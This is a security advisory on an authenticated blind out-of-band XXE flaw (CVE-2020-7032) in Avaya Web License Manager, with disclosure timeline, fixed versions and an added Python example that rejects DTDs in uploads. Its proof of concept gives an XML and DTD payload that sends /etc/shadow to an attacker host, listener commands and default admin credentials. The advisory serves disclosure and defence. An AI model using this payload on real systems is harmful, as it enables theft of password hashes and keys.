Blind Out-Of-Band XML External Entity Injection in Avaya Web License Manager

Project Description

By using an XXE injection it is possible to read confidential data like /etc/shadow or private keys. In addition, a special payload can affect the availability of the web application.


Vendor description

“As a global leader in delivering superior communications experiences, Avaya provides the most complete portfolio of software and services for multi-touch contact center and unified communications offered on premises, in the cloud, or a hybrid. Today’s digital world centers on communications enablement, and no other company is better positioned to do this than Avaya.”

Source: https://www.avaya.com/en/

Business recommendation

The vendor provides a patch for the Avaya Web License Manager which should be installed immediately.

SEC Consult recommends performing a thorough security review, conducted by security professionals, to identify and resolve all security issues.

Vulnerability overview/description

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

This vulnerability in the Avaya Web License Manager (WebLM) allows an authenticated user to read arbitrary files in the context of the web server (Tomcat) by uploading a specially crafted XML file through the license upload functionality. Examples of sensitive files that can be read this way are /etc/shadow, SSH keys and other configuration files.

Proof of concept

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

Log in as a user at https://$IP/WebLM/ and navigate to “Install License”. If WebLM has never been used before or has not been hardened, the default credentials are admin:weblmadmin.

Create an XML file like the following:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

and a DTD file like:

<!ENTITY % d SYSTEM "file:///etc/shadow"> 
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">

Start a web server, e.g. Python's SimpleHTTPServer:

python -m SimpleHTTPServer 80

and an FTP server like GO XXE FTP Server:

./xxeserv 2121

Upload the crafted XML file by clicking the install button.
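The document above is exactly the shape of input an upload handler must refuse. As an added example that is not part of the advisory and not Avaya's or WebLM's code, the following Python shows a hardened parse of an uploaded license file using the standard-library expat parser: parameter-entity processing is switched off and any DOCTYPE or entity declaration aborts parsing before the parser would ever consider fetching an external DTD. The two sample documents are constructed for this example, and the attacker host from the proof of concept is replaced by a placeholder.

```python
import xml.parsers.expat as expat


class DoctypeRejected(Exception):
    """Raised when an uploaded XML document declares a DTD or an entity."""


# Constructed sample uploads (not taken from any real WebLM deployment).
BENIGN_UPLOAD = '<?xml version="1.0"?><license><id>EXAMPLE-1234</id></license>'

# The advisory's wrapper document, with the attacker host replaced by a placeholder.
XXE_UPLOAD = """<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://ATTACKER_HOST_PLACEHOLDER/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>"""


def parse_upload_strictly(xml_text: str) -> dict:
    """Parse an uploaded document with DTD processing disabled.

    Returns a flat mapping of element name to text content. A DOCTYPE or
    entity declaration raises DoctypeRejected; any other malformed input
    raises expat.ExpatError. Neither path contacts the network.
    """
    parser = expat.ParserCreate()
    # Never read or expand parameter entities (the %asd; / %c; chain above).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{doctype_name}' is not allowed in uploads")

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise DoctypeRejected(f"entity declaration '{name}' is not allowed in uploads")

    def reject_external_ref(context, base, system_id, public_id):
        # Returning 0 tells expat to stop with an error instead of following the reference.
        return 0

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref

    result: dict = {}
    stack: list = []

    def start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(data):
        if stack:
            result[stack[-1]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return result


def classify_upload(xml_text: str) -> str:
    """Return 'accepted', 'rejected-dtd' or 'rejected-malformed' for an upload."""
    try:
        parse_upload_strictly(xml_text)
    except DoctypeRejected:
        return "rejected-dtd"
    except expat.ExpatError:
        return "rejected-malformed"
    return "accepted"


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_UPLOAD), ("xxe", XXE_UPLOAD)):
        print(f"{label}: {classify_upload(doc)}")
```

Rejecting the DOCTYPE outright is the simplest defence because a license file has no legitimate need for a DTD. For a Java application running on Tomcat, the equivalent is to set the feature http://apache.org/xml/features/disallow-doctype-decl to true on the DocumentBuilderFactory (or SAXParserFactory) before parsing any user-supplied XML.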


Vulnerable / tested versions

The following version has been tested:

  • Avaya Web License Manager 6.3

The vendor does not support versions below 7.x. Probably all versions below 7 are affected.

Vendor contact timeline

2020-03-18: Contacting vendor through securityalerts@avaya.com
2020-03-19: Vendor replied and started the process to verify the vulnerability
2020-04-03: Second mail to vendor to check if they have verified the issue
2020-05-18: Release of Hotfix for WebLM (embedded with SMGR) version 8.1.2.x
2020-07-01: Advisory release postponed, due to a delayed patch for version 7
2020-11-16: Patch release for version 7 and 8 of WebLM standalone and SMGR
2020-11-17: Publication of the advisory

Solution

Version 6: Upgrade to a new major release

Version 7: Upgrade to 7.1.3.7 or later

Version 8: Install hot fix #7 or upgrade to version 8.1.3

Official patch: https://downloads.avaya.com/css/P8/documents/101072249

Workaround

No workaround available.

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

EOF Markus Koplin / @2020


Project Details

  • Title: Blind Out-Of-Band XML External Entity Injection (Authenticated)
  • Product: Avaya Web License Manager
  • Vulnerable version: 6.x, 7.0 through 7.1.3.6, 8.0 through 8.1.2.0.0
  • Fixed version: 7.1.3.7 and 8.1.3
  • CVE number: CVE-2020-7032
  • Impact: Medium
  • Homepage: https://www.avaya.com/en/
  • Found: 03/2020
  • By: M. Koplin (Office Munich) | SEC Consult Vulnerability Lab